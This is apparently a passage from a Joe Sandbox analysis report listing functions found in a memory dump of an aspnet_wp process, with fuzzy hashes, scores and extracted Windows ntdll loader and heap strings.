Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: @$DelegatedNtdll$\SystemRoot\system32\
API String ID: 0-2391371766
Opcode ID: a35b649031b9795e02e30953006c28fe51e72fbfc02214c074d7fc1377616544
Instruction ID: ccabe119e3edf400a032d830c32cde9fd3a1bc7eb75b251375f2251eb423189e
Opcode Fuzzy Hash: a35b649031b9795e02e30953006c28fe51e72fbfc02214c074d7fc1377616544
Instruction Fuzzy Hash: 7BB1AF71618742AFE711DE54C895F6BBBE8BB447A0F020D2BFD459B250D770E904CB92

Function 054CA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 054CA1C1
\??\, xrefs: 0552C1E4
FilterFullPath, xrefs: 0552C2E6

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 35f9d2785ea530c57dfa899b7bb2be68608b8181c1be8a94d1786214ffdc9e29
Instruction ID: e9882d91fa93c2ad6ac931cbaf67a146797664c78833d9349f9cbf7d7f271bcc
Opcode Fuzzy Hash: 35f9d2785ea530c57dfa899b7bb2be68608b8181c1be8a94d1786214ffdc9e29
Instruction Fuzzy Hash: 9AA16876901629ABDB21DF24CC88BEEB7B8FF45710F1005EAE909A7251D7359E84CF90

Function 055636EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

LdrpResMapFile Exit, xrefs: 05563727
LdrpResMapFile Enter, xrefs: 05563715
@, xrefs: 05563867

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
API String ID: 0-318774311
Opcode ID: e24a9abdfde102869d39bfecb0f330d1d916dc77dc8189946a9a405cccf3748f
Instruction ID: 5e154ad889d7306dc8bff34e74d95a573e52096851ab5d5762cc2f63b90ae0c2
Opcode Fuzzy Hash: e24a9abdfde102869d39bfecb0f330d1d916dc77dc8189946a9a405cccf3748f
Instruction Fuzzy Hash: DB817971609381AFE311DF15C844BAABBE9FF84750F050D6EB9819B390D774E904CBA2

Function 05557410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON

Download Yara Rule

Strings

Objects=%4u, xrefs: 055575EA
VirtualAlloc, xrefs: 055575FC
Objects>%4u, xrefs: 055575D5

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: Objects=%4u$Objects>%4u$VirtualAlloc
API String ID: 0-3870751728
Opcode ID: 356acb587bd1b5cb4605b2feb601aa4b3167b4a5cbb5e969eeece5442f551ea8
Instruction ID: c2a26299be2389999b04c820eda8a5f10d7896347a8651fe31a7711bb046d21c
Opcode Fuzzy Hash: 356acb587bd1b5cb4605b2feb601aa4b3167b4a5cbb5e969eeece5442f551ea8
Instruction Fuzzy Hash: 07916BB0E102059FDB14CFA8C494BADBBF1FF88354F24816AE905AB391E7759842CF94

Function 054DB440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

LdrpResGetResourceDirectory Enter, xrefs: 054DB465
LdrpResGetResourceDirectory Exit, xrefs: 054DB477
{, xrefs: 055337B6

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: 25ea915bfc1fa0e99d4fa39860c163b92c2c84694ff1f90f17ce000713575918
Instruction ID: da5622fccf680e2936699759e1d41305aa84e6dd3575883aef2c1b45ca2997b8
Opcode Fuzzy Hash: 25ea915bfc1fa0e99d4fa39860c163b92c2c84694ff1f90f17ce000713575918
Instruction Fuzzy Hash: 2A91EF71A04209CFDB21CF58C960BEEB7B1FF01354F16459AE856AB390D7789A81CFA1

Function 0550909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 05509148
&, xrefs: 05545CF8
%, xrefs: 05545D3F

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: 0c42aa9ea2c9b3000d76745328d7b5de9e8cfb3a4c8f01118e03dc17f5f90d2a
Instruction ID: b65e1a8de8861741337833b21442176c49016aa2d2587824dc78a78bfe9b0e7b
Opcode Fuzzy Hash: 0c42aa9ea2c9b3000d76745328d7b5de9e8cfb3a4c8f01118e03dc17f5f90d2a
Instruction Fuzzy Hash: 8171BB702093429FC710DF64C984A2BBBF6BFC4618F109A1DF49A572D6D730E906CB92

Function 055AB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

GlobalizationUserSettings, xrefs: 055AB834
\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 055AB82A
TargetNtPath, xrefs: 055AB82F

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 438db17848455b9c7dd8000286aeea0d9a9e20d451a00b95fb1aa39f2656b97c
Instruction ID: 441053a70724b1a1a598e8560c52378c20ff99093cc20d959faea4764d6e3b84
Opcode Fuzzy Hash: 438db17848455b9c7dd8000286aeea0d9a9e20d451a00b95fb1aa39f2656b97c
Instruction Fuzzy Hash: FD615D72941229AFDB21DF54CC88BDDBBB8BF14720F0101E9A509A7250DB749E84CFD0

Function 054CF7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 0552E6A6
HEAP: , xrefs: 0552E6B3
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0552E6C6

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 5ae7fddc743fe3a0fa528dd0f323504f398671a374b941e4ecfcbbef2701312d
Instruction ID: 5eb563625c6ddb8e91fe822861ba77fe7e34d1555ae6d513a2270c59dd224e9a
Opcode Fuzzy Hash: 5ae7fddc743fe3a0fa528dd0f323504f398671a374b941e4ecfcbbef2701312d
Instruction Fuzzy Hash: 6051E435304644AFE712DBA8C849FEABBF9FF46300F0440EAE5419B691D778E945CB60

Function 0550C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 055482DE
Failed to reallocate the system dirs string !, xrefs: 055482D7
minkernel\ntdll\ldrinit.c, xrefs: 055482E8

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 92a94d1e30265e69bbc30246be03723da9a95697a6ccf3d546b786ce53501855
Instruction ID: 39509e0340646923f016a09e14a6dd63b12c024c58a30742d124241566f3250f
Opcode Fuzzy Hash: 92a94d1e30265e69bbc30246be03723da9a95697a6ccf3d546b786ce53501855
Instruction Fuzzy Hash: FD41E171654700EFC721EB68D949BABBBE8BF45754F004A2FB94593290EB70E804DB91

Function 054C758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 0552AFAB
Invalid address specified to %s( %p, %p ), xrefs: 0552AFCB
HEAP: , xrefs: 0552AFB8

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: eb17503c54b4670073f789dceed88b06957a50355d30cd41999dccbe8730bb82
Instruction ID: 9eebf02885ee68a938fa38bbf5cbf02c4fcbb35ced92aa36621f04e289c164ba
Opcode Fuzzy Hash: eb17503c54b4670073f789dceed88b06957a50355d30cd41999dccbe8730bb82
Instruction Fuzzy Hash: 124106783082508FDF65CA1DC084BF67BA2FF82354F1944EFD4468B286D6B8D486CB51

Function 055016CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrtls.c, xrefs: 05541B4A
TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 05541B39
LdrpAllocateTls, xrefs: 05541B40

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: b316fee389797bf2dc0982c20191fec9ce919eefdb5b6f39c6812ba32471c573
Instruction ID: 0c524f47594022540ff1e037cedeb615982b62a9bee6de429dda93a0fd1b1f9c
Opcode Fuzzy Hash: b316fee389797bf2dc0982c20191fec9ce919eefdb5b6f39c6812ba32471c573
Instruction Fuzzy Hash: A7418D75A00A09AFDB15CFA9CC45BEDBBF5FF48704F14851AE406A7250DB75A900DFA0

Function 0558C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 0558C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0558C1C5
PreferredUILanguages, xrefs: 0558C212

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: c80e5b71d252bbd73e44f51031405f8dc8a7bd7ab3bc03ae736a5224353d0e91
Instruction ID: d98008f713388d571300c32c6d9ff0e4a29498bda6c292361eb25dfca6b100d0
Opcode Fuzzy Hash: c80e5b71d252bbd73e44f51031405f8dc8a7bd7ab3bc03ae736a5224353d0e91
Instruction Fuzzy Hash: B4417372E00219EBDF11EAD4C845FFEB7B9BB54700F10406AE946BB280D7749E44CB60

Function 05554755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05554888
minkernel\ntdll\ldrredirect.c, xrefs: 05554899
LdrpCheckRedirection, xrefs: 0555488F

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 090bcc9c004f825a4f1084604592f312f8547be5873f861de6baf16b8875c17f
Instruction ID: 656f5fe9fe9fac3818d03e5432d471d3574e01ee14ee435ec797f576802f9b4c
Opcode Fuzzy Hash: 090bcc9c004f825a4f1084604592f312f8547be5873f861de6baf16b8875c17f
Instruction Fuzzy Hash: 8D41CF32A14651DFCF21CE68D864E667BE5FF89B60B06056BEC4997311D730E881CB91

Function 05564144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 05564172
@, xrefs: 05564225
LdrpResValidateFilePath Enter, xrefs: 05564160

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: ad0849572d045c60371585c34724c5e1734221fbbccdb4cac11362d0b4c41702
Instruction ID: 54e12187b43b1ecafe1056512e5faea71cfeac163b8d8ccca35175f88d315135
Opcode Fuzzy Hash: ad0849572d045c60371585c34724c5e1734221fbbccdb4cac11362d0b4c41702
Instruction Fuzzy Hash: C341F371A04698CBEF22DBE5C884BEDBBB9FF85340F24085AD902EB781D7349941CB50

Function 0555B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

GlobalFlag, xrefs: 0555B68F
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0555B632
@, xrefs: 0555B670

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: c6da95a26fb735e10172fadc405dc1e7ecb96b8f2a202ec7a86f9f7712c2fe1a
Instruction ID: 87b050f707e7faf89a31f8f8bf33eaa08d32c4adcd3d7a95c5e009e789fd8946
Opcode Fuzzy Hash: c6da95a26fb735e10172fadc405dc1e7ecb96b8f2a202ec7a86f9f7712c2fe1a
Instruction Fuzzy Hash: EA316FB1A00209AFDB10EF95CCA8AEEBB78FF44754F14046AEA06A7140D7749E04CBA4

Function 05501607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrtls.c, xrefs: 05541A51
LdrpInitializeTls, xrefs: 05541A47
DLL "%wZ" has TLS information at %p, xrefs: 05541A40

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 43cc0f13e66d0410df5f44f622897f0b97832afa7016d9ba154203efcb341cba
Instruction ID: 79fd9996eaa379976f6d324797f04e6a7cfc3651d2c851d2e2c4ffd617f959d1
Opcode Fuzzy Hash: 43cc0f13e66d0410df5f44f622897f0b97832afa7016d9ba154203efcb341cba
Instruction Fuzzy Hash: 5731F331A10A00AFE7109B99CC8AFBA7AB9FB80744F04041AF505A75C0EBB0FE44D7E1

Function 055520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 055520F3
LdrpInitializationFailure, xrefs: 055520FA
minkernel\ntdll\ldrinit.c, xrefs: 05552104

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: f09a5f0a3f4e8494aef83b9a39a19315c32c464132a5ed4bcb75c406f3a1f340
Instruction ID: bc9dcc6ce470775a62a98ccc2e3cf0a79e496684f6a89d0ffc4187f5e2fbf393
Opcode Fuzzy Hash: f09a5f0a3f4e8494aef83b9a39a19315c32c464132a5ed4bcb75c406f3a1f340
Instruction Fuzzy Hash: FCF02835B40208BFE710D649DC5BFDA3BA8FB80B54F10001BFA006B680D6F0A504DA91

Function 0554E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 0554E75A
UEFI, xrefs: 0554E751

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: cd015d2f1f2f5f29346112e5ce5f3da00f5c31b100bca17935ecee3e08be667f
Instruction ID: edf7dcb1bdf863b18877c61939cb3dc1edceeb38cb832d2c822d85af6b76e86c
Opcode Fuzzy Hash: cd015d2f1f2f5f29346112e5ce5f3da00f5c31b100bca17935ecee3e08be667f
Instruction Fuzzy Hash: 53616C71E042099FDB25DFA8C845BAEBBB9FF48704F20446EE549EB291D731A900CF51

Function 054EF720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 054EF860
$, xrefs: 054EF7F6

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: $$$
API String ID: 0-233714265
Opcode ID: ea4ba810d9adeec8efd9e7c2bfada34cd0cfe2a13e055d14e3efc5e932679130
Instruction ID: 9e29504ae61e710dbd5075f90be415e87ba0256819c66bf75e4bdd1816f907f3
Opcode Fuzzy Hash: ea4ba810d9adeec8efd9e7c2bfada34cd0cfe2a13e055d14e3efc5e932679130
Instruction Fuzzy Hash: C461BD71A0474AEFDB20DFA4C584BEDBBB2FF44704F14406ED5066B680DB74A989DB50

Function 054D04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 054D063D
kLsE, xrefs: 054D0540

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 8bca6b1e0e8925b461ccb75719867c7c2623eeec441e3ff42e5937371482d337
Instruction ID: 0f7a367a33f4153e096c9c4b1ea5a1442a8d3031e6cfb8ab6ca50b61abf5f4ef
Opcode Fuzzy Hash: 8bca6b1e0e8925b461ccb75719867c7c2623eeec441e3ff42e5937371482d337
Instruction Fuzzy Hash: 355178716047428BC724EF29C568AE7FBE5BF85300F00887FEA9A87240F7719545CBA2

Function 055635BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 055635EC
LdrResGetRCConfig Exit, xrefs: 055635FE

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 47ef680c308d2d5a7ac0b8d54d18a3efa9892509521e25185abe0a1de2b5b872
Instruction ID: 8f1e73cd9cf8196c00b3c8a29087690daed16835e0ea698618b1b01137119ff0
Opcode Fuzzy Hash: 47ef680c308d2d5a7ac0b8d54d18a3efa9892509521e25185abe0a1de2b5b872
Instruction Fuzzy Hash: 5531CD322087829BD312DF29D858B6AB7E4FF85714F060C6AF8558B3D1EB70D905CB92

Function 055034B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

RtlpInitializeAssemblyStorageMap, xrefs: 05542A90
SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 05542A95

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: a2e62e453e167bebd275022f29107336d295615d650806bb08c9247fa2c6473b
Instruction ID: 7ed2f80fa39ceef57e4a5a10bb86870ae6984476607b6f4cd729f01ef8271bf5
Opcode Fuzzy Hash: a2e62e453e167bebd275022f29107336d295615d650806bb08c9247fa2c6473b
Instruction Fuzzy Hash: BB115C72B04210BBE725CA498D45FAF72A9FB84B18F1684297D01EF280D6B0CD00C6E0

Function 0550A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0550A5E9
Cleanup Group, xrefs: 0550A5E4

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 64889a0e641ebcaa1e18830306e631409dd96ff8577dad8473c7c68625556f89
Instruction ID: 1091d24c36fc92808dd208a11f3245c73840663507627cd4a6c6db00532d0b3e
Opcode Fuzzy Hash: 64889a0e641ebcaa1e18830306e631409dd96ff8577dad8473c7c68625556f89
Instruction Fuzzy Hash: 8201D1B2654700AFE311DF24CE4AB667BF8F784715F00893AB949CB190E734D904DB46

Function 054DC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 054DC8C3, 054DCA40

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: e01b26082dbb5a929d349909681379fadadae4706344e6cf405b8e7ab0fbfb7b
Instruction ID: b7e919f33bd7ec0abe76afa2f14ceae8ecbadcdcdb7318677a45194a8d24f4f6
Opcode Fuzzy Hash: e01b26082dbb5a929d349909681379fadadae4706344e6cf405b8e7ab0fbfb7b
Instruction Fuzzy Hash: 20825F75E042189BDB24CFA9C9A4BEEF7B2BF44710F1481AAD85AAB354D7309D41CF60

Function 0550F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f485c5847a2f3b9d0dff95b9aa21ce9dd2d96648acff5b226b1f96683aa20bb
Instruction ID: de7679e070b370bf21280d75082914730b6bd3a48af97d4f2b41d89da1b22c45
Opcode Fuzzy Hash: 9f485c5847a2f3b9d0dff95b9aa21ce9dd2d96648acff5b226b1f96683aa20bb
Instruction Fuzzy Hash: 17413AB4D00688AFDB20CFA9D581AAEBFF8FF48340F50856EE459A7251DB309945DF60

Function 05556420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 055565C1

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: a03c1aa77b6c00922808986fb5c17875688b72a35f73cc733943af259d401ccc
Instruction ID: 1375c232500522e6ae852fef2d399cc2c7e53df03501074412448984a53ae4c6
Opcode Fuzzy Hash: a03c1aa77b6c00922808986fb5c17875688b72a35f73cc733943af259d401ccc
Instruction Fuzzy Hash: B0916072A40259AFDB21DF95CC95FEE7BB8FF04760F50405AFA01AB190D775A904CBA0

Function 0550A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 055467C9

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 545346c05b42750e3e04dea02d52972d888049773e6cfd7366922b4403d3baab
Instruction ID: 3bc0c1674387b010b68069bc2c347ade073fd9e6aee7a0974a3f8f7cb4d09f87
Opcode Fuzzy Hash: 545346c05b42750e3e04dea02d52972d888049773e6cfd7366922b4403d3baab
Instruction Fuzzy Hash: 5E715C75E0421A9FDF28CF99D590BEEBBF2BF49718F14852AE406AB240D7319941CF60

Function 054D973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

@, xrefs: 054D97F3

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction ID: 9a0ccd5d3023088696fbf5c338630532b6aa99c979d7727f60af91ea5d7df904
Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction Fuzzy Hash: 03617A75E04619ABDB21DF9AC854BEEFBB5FF80B10F14416AE815E7290D7309A01CBA0

Function 0555F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 0555F867

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction ID: 379f9f93e4bc61e0c6e4ab5b92d724fd7e1176b48283eb85cb6d37cdaed7029a
Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction Fuzzy Hash: 48519CB2608705AFE7229F55C854F6BB7F8FF84760F00092ABA8197290E770ED04CB95

Function 054EE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 054EE6A4

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 68603b03a233c2e97b0ced80931e07dc7785342dfa11a834a3a29086d1e5dc37
Instruction ID: a4b70d198d23f580148284f35bca469dc397a8dda3051810b07ae27bdda53160
Opcode Fuzzy Hash: 68603b03a233c2e97b0ced80931e07dc7785342dfa11a834a3a29086d1e5dc37
Instruction Fuzzy Hash: F341BD72608311ABD720DB75D844BEBB7ECAF88605F040A6FF985E7240E674D914C796

Function 0554C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0554C77F

Memory Dump Source

